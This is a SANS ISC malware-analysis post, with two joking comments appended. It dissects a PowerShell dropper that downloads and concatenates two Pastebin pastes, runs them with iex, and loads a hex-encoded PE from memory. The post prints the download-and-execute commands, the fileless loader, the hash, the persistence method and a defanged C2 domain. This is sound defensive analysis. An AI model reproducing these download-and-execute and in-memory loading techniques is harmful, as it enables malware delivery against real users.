|
In politic, there is a strategy which says “divide and conquer”. It’s also true for some pieces of malware that spread their malicious code amongst multiple sources. One of our readers shared a sample of Powershell code found on Pastebin that applies exactly this technique. Thanks to him! Here is the complete Powershell command line (beautified for easy read)
powershell.exe -command
$request = [System.Net.WebRequest]::Create('hxxps://pastebin[.]com/raw/mVjViriF’);
$request.Method="Get”;
$response = $request.GetResponse();
$requestStream = $response.GetResponseStream();
$readStream = New-Object System.IO.StreamReader $requestStream;
$data=$readStream.ReadToEnd();
$rrequest = [System.Net.WebRequest]::Create('hxxps://pastebin[.]com/raw/g3KQyPSA’);
$rrequest.Method="Get”;
$rresponse = $rrequest.GetResponse();
$rrequestStream = $rresponse.GetResponseStream();
$rreadStream = New-Object System.IO.StreamReader $rrequestStream;
$ddata=$rreadStream.ReadToEnd();
iex($data+$ddata)
The code is pretty easy to understand: It grabs the content of 2 pasties from pastebin.com, concatenates them and executes them through iex(), an alias for Invoke-Expression(). So, we can expect these pasties to contain more Powershell code. Indeed, here is the content of the concatenated data:
function HexToBin([string]$s) {
$return = @()
for ($i = 0; $i -lt $s.Length ; $i += 2)
{
$return += [Byte]::Parse($s.Substring($i, 2), [System.Globalization.NumberStyles]::HexNumber)
}
Write-Output $return
}
$Str = ‘4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000
000000000000000800000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E2044
4F53206D6F64652E0D0D0A2400000000000000504500004C0103004050B35B0000000000000000E00002010B010800007E0100000A0000000
00000CE9C010000200000000000000000400000200000000200000400000000000000040000000000000000E0010000020000000000000200
40850000100000100000000010000010000000000000100000000000000000000000789C01005300000000A00100000800000000000000000
000000000000000000000C001000C000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000200000080000000000000000000000082000004800000000000000000000002E74657874000000D47C01000020000
[stuff deleted]
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000009001000C000000D
03C00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000';
$Str = $Str.replace("0","0");
[byte[]]$Data = HexToBin($str);
$asm = [System.Reflection.Assembly]::Load($Data);
$asm.EntryPoint.invoke($null,$null);
write-host "Can you help me";
[void][System.Console]::ReadKey($true);
This piece of code decodes the hex-encoded $str variable into $data using the HexToBin() function and executes it. You can see the beginning of the string ‘0x4D 0x5A 0x90’ which indicates that it’s a PE file. The way it is executed is interesting. It uses the System.Reflection.Assembly[1] class to load the code and execute it from memory (file less Powershell) The PE sample has the following SHA256 hash: 30db9979df050b966c8d89e0f76377b618145133b54662f8fa65dbce02f8c4b6.exe. It was unknown on VT yesterday but today it was uploaded from Denmark and reached already a score of 24/63[2]. It adds persistence by creating a .lnk file into %AppData%\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ pointing to a copy of itself stored in %TEMP%. It tries to communicate with a C2 (testhoward[.]mysecondarydns[.]com) via HTTPS. [1] https://docs.microsoft.com/en-us/dotnet/api/system.reflection.assembly?view=netframework-4.7.2 Xavier Mertens (@xme) |
Xme 686 Posts ISC Handler Nov 22nd 2018 |
| Thread locked Subscribe |
Nov 22nd 2018 3 years ago |
|
And NOW I'm hungry, with all this talk of pasties!
https://en.wikipedia.org/wiki/Pasty |
Anonymous |
| Quote |
Nov 22nd 2018 3 years ago |
|
X - very interesting article. But all that is just secondary to your use of the term "pasties". Translated from British, its a pastry. BUT the most overwhelmingly common :'-) use is <rotfl> "nipple covers" 8-D. <lmao>. I suppose that you saw a huge spike in hits that day.
 |
Brett 19 Posts |
| Quote |
Nov 28th 2018 3 years ago |
Sign Up for Free or Log In to start participating in the conversation!
https://www.sans.edu
